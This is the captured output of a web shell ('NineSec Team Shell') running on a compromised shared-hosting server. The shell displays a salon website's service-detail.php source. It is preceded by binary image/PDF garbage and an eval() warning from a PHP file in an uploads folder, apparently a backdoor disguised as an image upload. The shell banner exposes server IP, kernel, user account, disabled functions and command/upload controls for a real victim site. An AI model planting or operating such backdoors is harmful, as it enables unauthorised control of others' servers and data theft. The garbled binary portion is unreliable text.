JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/prince.ranchihairsalon.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/prince.ranchihairsalon.com/public_html/service-detail.php
<?php
// Start session
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// Set base URL
$base_url = 'https://www.prince.ranchihairsalon.com/';

// Get service ID from URL
$service_id = isset($_GET['id']) ? intval($_GET['id']) : 0;

if ($service_id === 0) {
    header('Location: ' . $base_url . 'services');
    exit();
}

require_once 'includes/config.php';

// Fetch service details
try {
    $stmt = $pdo->prepare("SELECT * FROM services WHERE id = ?");
    $stmt->execute([$service_id]);
    $service = $stmt->fetch(PDO::FETCH_ASSOC);
    
    if (!$service) {
        header('Location: ' . $base_url . 'services');
        exit();
    }
    
    // Category information
    $category_info = [
        'hair_patch' => [
            'name' => 'Hair Patch Service',
            'icon' => 'fas fa-hair-alt',
            'color' => '#3498db',
            'seo_name' => 'Hair Patch',
            'description' => 'Professional hair patch services in Lalpur, Ranchi'
        ],
        'hair_wig' => [
            'name' => 'Hair Wig Service',
            'icon' => 'fas fa-user-tie',
            'color' => '#2ecc71',
            'seo_name' => 'Hair Wig',
            'description' => 'Expert wig services in Lalpur, Ranchi'
        ],
        'barber' => [
            'name' => 'Barber Service',
            'icon' => 'fas fa-cut',
            'color' => '#e74c3c',
            'seo_name' => 'Barber',
            'description' => 'Professional barber services in Lalpur, Ranchi'
        ],
        'hair_care' => [
            'name' => 'Hair Care Service',
            'icon' => 'fas fa-shampoo',
            'color' => '#9b59b6',
            'seo_name' => 'Hair Care',
            'description' => 'Premium hair care services in Lalpur, Ranchi'
        ],
        'beauty' => [
            'name' => 'Beauty Service',
            'icon' => 'fas fa-spa',
            'color' => '#f39c12',
            'seo_name' => 'Beauty',
            'description' => 'Complete beauty services in Lalpur, Ranchi'
        ]
    ];
    
    $category_data = $category_info[$service['category']] ?? [
        'name' => 'Service',
        'icon' => 'fas fa-cut',
        'color' => '#000',
        'seo_name' => 'Service',
        'description' => 'Professional services in Lalpur, Ranchi'
    ];
    
    $seo_category = $category_data['seo_name'];
    $current_price = $service['discounted_price'] ?: $service['price'];
    
    // Set SEO variables
    $page_title = $service['service_name'] . " in Lalpur, Ranchi | ₹" . $current_price . " | Prince the Barber";
    $meta_description = "Book " . $service['service_name'] . " in Lalpur, Ranchi at ₹" . $current_price . ". Professional " . $seo_category . " services at Prince the Barber. Expert staff, hygienic environment. Call 90319 99993";
    $meta_keywords = $service['service_name'] . ", " . $service['service_name'] . " in Lalpur, " . $service['service_name'] . " in Ranchi, book " . $seo_category . " service Ranchi, " . $seo_category . " services Lalpur, Prince the Barber " . $service['service_name'];
    
} catch(Exception $e) {
    header('Location: ' . $base_url . 'services');
    exit();
}

// Include header with SEO variables
require_once 'includes/header.php';
?>

<!-- Structured Data for Service -->
<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Service",
    "serviceType": "<?php echo addslashes($seo_category); ?>",
    "provider": {
        "@type": "HairSalon",
        "name": "Prince the Barber",
        "image": "<?php echo !empty($service['image_url']) ? $service['image_url'] : $base_url . 'assets/images/logo.jpeg'; ?>",
        "address": {
            "@type": "PostalAddress",
            "streetAddress": "Lalpur",
            "addressLocality": "Ranchi",
            "addressRegion": "Jharkhand",
            "postalCode": "834001",
            "addressCountry": "IN"
        },
        "telephone": "+919031999993",
        "openingHours": "Mo-Su 10:00-20:00",
        "priceRange": "₹₹"
    },
    "name": "<?php echo addslashes($service['service_name']); ?>",
    "description": "<?php echo addslashes($service['description']); ?>",
    "offers": {
        "@type": "Offer",
        "price": "<?php echo $current_price; ?>",
        "priceCurrency": "INR"
    }
}
</script>

<!-- Breadcrumb -->
<nav aria-label="breadcrumb" class="bg-light py-3">
    <div class="container">
        <ol class="breadcrumb mb-0">
            <li class="breadcrumb-item"><a href="<?php echo $base_url; ?>">Home</a></li>
            <li class="breadcrumb-item"><a href="<?php echo $base_url; ?>services">Services</a></li>
            <li class="breadcrumb-item">
                <a href="<?php echo $base_url; ?>services#<?php echo str_replace('_', '-', $service['category']); ?>">
                    <?php echo $category_data['name']; ?>
                </a>
            </li>
            <li class="breadcrumb-item active" aria-current="page"><?php echo htmlspecialchars($service['service_name']); ?></li>
        </ol>
    </div>
</nav>

<!-- Service Detail -->
<section class="py-5">
    <div class="container">
        <div class="row">
            <!-- Service Content -->
            <div class="col-lg-8">
                <!-- Service Header -->
                <div class="service-header mb-4">
                    <div class="d-flex align-items-start">
                        <div class="flex-shrink-0" style="color: <?php echo $category_data['color']; ?>;">
                            <i class="<?php echo $category_data['icon']; ?>" style="font-size: 3rem;"></i>
                        </div>
                        <div class="flex-grow-1 ms-4">
                            <div class="d-flex justify-content-between align-items-start">
                                <div>
                                    <h1 class="h2 mb-2 fw-bold">
                                        <?php echo htmlspecialchars($service['service_name']); ?>
                                    </h1>
                                    <span class="badge rounded-pill px-3 py-2 mb-3" 
                                          style="background-color: <?php echo $category_data['color']; ?>; color: white;">
                                        <i class="<?php echo $category_data['icon']; ?> me-1"></i>
                                        <?php echo $category_data['name']; ?>
                                    </span>
                                </div>
                                <a href="<?php echo $base_url; ?>services" class="btn btn-outline-secondary btn-sm">
                                    <i class="fas fa-arrow-left me-1"></i> Back to Services
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
                
                <!-- Service Image -->
                <?php if(!empty($service['image_url'])): ?>
                <div class="service-image-main mb-4">
                    <div class="card border-0 shadow-lg rounded-3 overflow-hidden">
                        <img src="<?php echo $service['image_url']; ?>" 
                             class="card-img-top img-fluid w-100" 
                             alt="<?php echo htmlspecialchars($service['service_name']); ?> - Prince the Barber Lalpur Ranchi"
                             title="Book <?php echo htmlspecialchars($service['service_name']); ?> in Lalpur, Ranchi"
                             style="max-height: 400px; object-fit: cover;">
                    </div>
                </div>
                <?php endif; ?>
                
                <!-- Service Overview -->
                <div class="service-overview mb-4">
                    <div class="row g-3">
                        <div class="col-md-6">
                            <div class="card border-0 bg-light h-100">
                                <div class="card-body">
                                    <h5 class="card-title">
                                        <i class="fas fa-info-circle text-primary me-2"></i>
                                        Service Details
                                    </h5>
                                    <ul class="list-unstyled mt-3">
                                        <li class="mb-2">
                                            <i class="fas fa-clock text-muted me-2"></i>
                                            <strong>Duration:</strong> <?php echo $service['duration_minutes']; ?> minutes
                                        </li>
                                        <li class="mb-2">
                                            <i class="fas fa-certificate text-muted me-2"></i>
                                            <strong>Expert Level:</strong> <?php echo $service['expertise_level'] ?? 'Professional'; ?>
                                        </li>
                                        <li class="mb-2">
                                            <i class="fas fa-venus-mars text-muted me-2"></i>
                                            <strong>Suitable For:</strong> <?php echo $service['gender'] ?? 'All Genders'; ?>
                                        </li>
                                        <li>
                                            <i class="fas fa-calendar-day text-muted me-2"></i>
                                            <strong>Available:</strong> <?php echo $service['available_days'] ?? 'Daily'; ?>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="card border-0 bg-light h-100">
                                <div class="card-body">
                                    <h5 class="card-title">
                                        <i class="fas fa-clock text-success me-2"></i>
                                        Timing & Availability
                                    </h5>
                                    <ul class="list-unstyled mt-3">
                                        <li class="mb-2">
                                            <i class="fas fa-business-time text-muted me-2"></i>
                                            <strong>Timing:</strong> <?php echo $service['available_timing'] ?? '10:00 AM - 8:00 PM'; ?>
                                        </li>
                                        <li class="mb-2">
                                            <?php if(($service['available_slots'] ?? 10) > 0): ?>
                                            <span class="badge bg-success px-3 py-2">
                                                <i class="fas fa-check-circle me-1"></i>
                                                <?php echo $service['available_slots']; ?> slots available
                                            </span>
                                            <?php else: ?>
                                            <span class="badge bg-warning px-3 py-2">
                                                <i class="fas fa-clock me-1"></i>
                                                Fully Booked
                                            </span>
                                            <?php endif; ?>
                                        </li>
                                        <li>
                                            <i class="fas fa-map-marker-alt text-danger me-2"></i>
                                            <strong>Location:</strong> Prince the Barber, Lalpur
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                
                <!-- Service Description -->
                <div class="service-description mb-4">
                    <h3 class="mb-3">
                        <i class="fas fa-info-circle text-primary me-2"></i>
                        Service Description
                    </h3>
                    <div class="card border-0 shadow-sm">
                        <div class="card-body">
                            <div class="description-content">
                                <?php echo nl2br(htmlspecialchars($service['description'])); ?>
                            </div>
                        </div>
                    </div>
                </div>
                
                <!-- What's Included -->
                <div class="included-services mb-4">
                    <h3 class="mb-3">
                        <i class="fas fa-check-circle text-success me-2"></i>
                        What's Included
                    </h3>
                    <?php
                    $service_includes = !empty($service['service_includes']) ? json_decode($service['service_includes'], true) : [
                        'Professional Consultation',
                        'Premium Quality Products',
                        'Expert Service Delivery',
                        'After-Service Care Tips',
                        'Follow-up Support'
                    ];
                    ?>
                    <div class="row g-2">
                        <?php foreach($service_includes as $include): ?>
                        <div class="col-md-6">
                            <div class="d-flex align-items-start p-3 bg-light rounded mb-2">
                                <i class="fas fa-check text-success mt-1 me-3"></i>
                                <div>
                                    <h6 class="mb-1"><?php echo htmlspecialchars($include); ?></h6>
                                    <p class="text-muted mb-0 small">Included in service package</p>
                                </div>
                            </div>
                        </div>
                        <?php endforeach; ?>
                    </div>
                </div>
                
                <!-- FAQ -->
                <div class="faq-section mb-4">
                    <h3 class="mb-3">
                        <i class="fas fa-question-circle text-info me-2"></i>
                        Frequently Asked Questions
                    </h3>
                    <div class="accordion" id="serviceFAQ">
                        <div class="accordion-item">
                            <h4 class="accordion-header">
                                <button class="accordion-button" type="button" data-bs-toggle="collapse" 
                                        data-bs-target="#faq1">
                                    How do I book this service?
                                </button>
                            </h4>
                            <div id="faq1" class="accordion-collapse collapse show" data-bs-parent="#serviceFAQ">
                                <div class="accordion-body">
                                    You can book <?php echo htmlspecialchars($service['service_name']); ?> through WhatsApp, 
                                    phone call, or by visiting our Lalpur salon. WhatsApp booking is fastest.
                                </div>
                            </div>
                        </div>
                        
                        <div class="accordion-item">
                            <h4 class="accordion-header">
                                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" 
                                        data-bs-target="#faq2">
                                    What is the exact duration?
                                </button>
                            </h4>
                            <div id="faq2" class="accordion-collapse collapse" data-bs-parent="#serviceFAQ">
                                <div class="accordion-body">
                                    This service typically takes <?php echo $service['duration_minutes']; ?> minutes 
                                    including consultation and aftercare instructions.
                                </div>
                            </div>
                        </div>
                        
                        <div class="accordion-item">
                            <h4 class="accordion-header">
                                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" 
                                        data-bs-target="#faq3">
                                    Do I need to prepare anything?
                                </button>
                            </h4>
                            <div id="faq3" class="accordion-collapse collapse" data-bs-parent="#serviceFAQ">
                                <div class="accordion-body">
                                    No special preparation needed. Just come as you are. For hair services, 
                                    we recommend clean hair for best results.
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                
                <!-- SEO Content -->
                <div class="seo-content card border-0 bg-light mt-4">
                    <div class="card-body">
                        <h4 class="card-title mb-3">
                            <?php echo htmlspecialchars($service['service_name']); ?> in Lalpur, Ranchi
                        </h4>
                        <p>
                            Looking for professional <strong><?php echo htmlspecialchars($service['service_name']); ?></strong> 
                            in <strong>Lalpur, Ranchi</strong>? Prince the Barber offers expert 
                            <?php echo strtolower($seo_category); ?> services at our modern salon in Lalpur. 
                            Our certified professionals ensure the best service experience.
                        </p>
                        <p>
                            As one of the leading salons in Ranchi, we pride ourselves on using premium products, 
                            maintaining strict hygiene standards, and providing exceptional customer service. 
                            Visit our Lalpur location today or book your appointment online.
                        </p>
                    </div>
                </div>
            </div>
            
            <!-- Booking Sidebar -->
            <div class="col-lg-4">
                <div class="sticky-top" style="top: 100px;">
                    <!-- Price Card -->
                    <div class="card border-0 shadow-lg mb-4 rounded-3">
                        <div class="card-header bg-primary text-white py-3 rounded-top-3">
                            <h5 class="mb-0">
                                <i class="fas fa-calendar-check me-2"></i>
                                Book This Service
                            </h5>
                        </div>
                        <div class="card-body">
                            <!-- Price -->
                            <div class="text-center mb-4">
                                <?php if($service['discounted_price']): ?>
                                <div class="mb-2">
                                    <span class="text-muted">Regular Price:</span>
                                    <del class="text-muted h5">₹<?php echo $service['price']; ?></del>
                                </div>
                                <h2 class="text-primary display-5 fw-bold">₹<?php echo $service['discounted_price']; ?></h2>
                                <span class="badge bg-danger px-3 py-2 mt-2">
                                    <i class="fas fa-bolt me-1"></i>
                                    Special Offer
                                </span>
                                <?php else: ?>
                                <h2 class="text-primary display-5 fw-bold">₹<?php echo $current_price; ?></h2>
                                <p class="text-muted mb-0">All inclusive price</p>
                                <?php endif; ?>
                                <p class="small text-muted mt-2">
                                    <i class="fas fa-clock me-1"></i>
                                    <?php echo $service['duration_minutes']; ?> minutes service
                                </p>
                            </div>
                            
                            <hr class="my-4">
                            
                            <!-- Quick Booking -->
                            <div class="d-grid gap-3">
                                <!-- WhatsApp Booking -->
                                <a href="https://wa.me/919031999993?text=Hi%20Prince%20the%20Barber%20Lalpur,%20I%20want%20to%20book%20<?php echo urlencode($service['service_name']); ?>%20service.%0A%0AService%20ID:%20<?php echo $service['id']; ?>%0APrice:%20₹<?php echo $current_price; ?>%0ADuration:%20<?php echo $service['duration_minutes']; ?>%20minutes%0A%0APlease%20let%20me%20know%20available%20time%20slots." 
                                   class="btn btn-success btn-lg py-3" target="_blank">
                                    <i class="fab fa-whatsapp me-2 fa-lg"></i>
                                    <span class="fw-bold">Book on WhatsApp</span>
                                </a>
                                
                                <!-- Call Booking -->
                                <a href="tel:+919031999993" class="btn btn-primary btn-lg py-3">
                                    <i class="fas fa-phone-alt me-2 fa-lg"></i>
                                    <span class="fw-bold">Call to Book</span>
                                </a>
                                
                                <!-- Online Booking -->
                                <?php if(isset($_SESSION['user_id'])): ?>
                                <a href="<?php echo $base_url; ?>user/book_service.php?service_id=<?php echo $service['id']; ?>" 
                                   class="btn btn-outline-primary btn-lg py-3">
                                    <i class="fas fa-calendar-alt me-2"></i>
                                    Book Online
                                </a>
                                <?php else: ?>
                                <a href="<?php echo $base_url; ?>auth/register.php?redirect=book_service&service_id=<?php echo $service['id']; ?>" 
                                   class="btn btn-outline-primary btn-lg py-3">
                                    <i class="fas fa-user-plus me-2"></i>
                                    Register & Book
                                </a>
                                <?php endif; ?>
                            </div>
                            
                            <!-- Salon Info -->
                            <div class="card border-info mt-4">
                                <div class="card-body">
                                    <h6 class="card-title">
                                        <i class="fas fa-store-alt text-info me-2"></i>
                                        Visit Our Lalpur Salon
                                    </h6>
                                    <p class="card-text small mb-2">
                                        <i class="fas fa-map-marker-alt text-danger me-2"></i>
                                        <strong>Address:</strong> Prince the Barber, Lalpur, Ranchi
                                    </p>
                                    <p class="card-text small mb-2">
                                        <i class="fas fa-clock text-warning me-2"></i>
                                        <strong>Hours:</strong> 10:00 AM - 8:00 PM (Daily)
                                    </p>
                                    <p class="card-text small mb-3">
                                        <i class="fas fa-parking text-success me-2"></i>
                                        <strong>Parking:</strong> Available
                                    </p>
                                    <div class="d-grid">
                                        <a href="https://maps.google.com/?q=Prince+the+Barber+Lalpur+Ranchi" 
                                           class="btn btn-sm btn-outline-info" target="_blank">
                                            <i class="fas fa-directions me-1"></i> Get Directions
                                        </a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                    <!-- Related Services -->
                    <?php
                    $stmt_related = $pdo->prepare("SELECT * FROM services WHERE category = ? AND id != ? ORDER BY RAND() LIMIT 3");
                    $stmt_related->execute([$service['category'], $service['id']]);
                    $related_services = $stmt_related->fetchAll(PDO::FETCH_ASSOC);
                    
                    if(count($related_services) > 0):
                    ?>
                    <div class="card border-0 shadow-sm rounded-3">
                        <div class="card-header bg-light rounded-top-3">
                            <h6 class="mb-0">Related Services</h6>
                        </div>
                        <div class="card-body">
                            <?php foreach($related_services as $related): 
                                $related_slug = !empty($related['slug']) ? $related['slug'] : strtolower(trim(preg_replace('/[^A-Za-z0-9-]+/', '-', $related['service_name'])));
                                $related_url = "service/" . $related_slug . "-" . $related['id'] . "-in-lalpur-ranchi";
                                $related_price = $related['discounted_price'] ?: $related['price'];
                            ?>
                            <div class="mb-3 pb-3 border-bottom">
                                <h6 class="mb-1">
                                    <a href="<?php echo $base_url . $related_url; ?>" class="text-decoration-none text-dark">
                                        <?php echo htmlspecialchars($related['service_name']); ?>
                                    </a>
                                </h6>
                                <div class="d-flex justify-content-between align-items-center">
                                    <span class="text-primary">₹<?php echo $related_price; ?></span>
                                    <a href="<?php echo $base_url . $related_url; ?>" class="btn btn-sm btn-outline-primary">
                                        View
                                    </a>
                                </div>
                            </div>
                            <?php endforeach; ?>
                            <a href="<?php echo $base_url; ?>services#<?php echo str_replace('_', '-', $service['category']); ?>" 
                               class="btn btn-sm btn-light w-100">
                                View All <?php echo $category_data['name']; ?>
                            </a>
                        </div>
                    </div>
                    <?php endif; ?>
                </div>
            </div>
        </div>
    </div>
</section>

<!-- CTA Section -->
<section class="py-5 bg-gradient-primary text-white">
    <div class="container text-center">
        <h2 class="mb-3">Book Your <?php echo htmlspecialchars($service['service_name']); ?> Today</h2>
        <p class="lead mb-4">Experience professional service at Prince the Barber, Lalpur - The best salon in Ranchi</p>
        <div class="d-flex justify-content-center gap-3 flex-wrap">
            <a href="https://wa.me/919031999993?text=Hi%20Prince%20the%20Barber%20Lalpur,%20I%20want%20to%20book%20<?php echo urlencode($service['service_name']); ?>%20service%20appointment%20today" 
               class="btn btn-light btn-lg" target="_blank">
                <i class="fab fa-whatsapp me-2"></i> WhatsApp Now
            </a>
            <a href="tel:+919031999993" class="btn btn-outline-light btn-lg">
                <i class="fas fa-phone-alt me-2"></i> Call: 90319 99993
            </a>
            <a href="https://maps.google.com/?q=Prince+the+Barber+Lalpur+Ranchi" 
               class="btn btn-outline-light btn-lg" target="_blank">
                <i class="fas fa-map-marker-alt me-2"></i> Visit Lalpur Salon
            </a>
        </div>
        <p class="mt-4 mb-0">
            <i class="fas fa-info-circle me-1"></i>
            Walk-ins welcome | Free consultation available | Expert staff
        </p>
    </div>
</section>

<!-- CSS for Service Detail -->
<style>
.bg-gradient-primary {
    background: linear-gradient(135deg, #0d6efd 0%, #0b5ed7 100%);
}

.rounded-3 {
    border-radius: 0.75rem !important;
}

.sticky-top {
    position: sticky;
    top: 100px;
    z-index: 100;
}

.accordion-button:not(.collapsed) {
    background-color: rgba(13, 110, 253, 0.1);
    color: #0d6efd;
}

.card {
    transition: transform 0.3s ease;
}

.card:hover {
    transform: translateY(-5px);
}

@media (max-width: 992px) {
    .sticky-top {
        position: static;
    }
    
    .display-5 {
        font-size: 2.5rem;
    }
}
</style>

<?php require_once 'includes/footer.php'; ?>

NineSec Team - 2022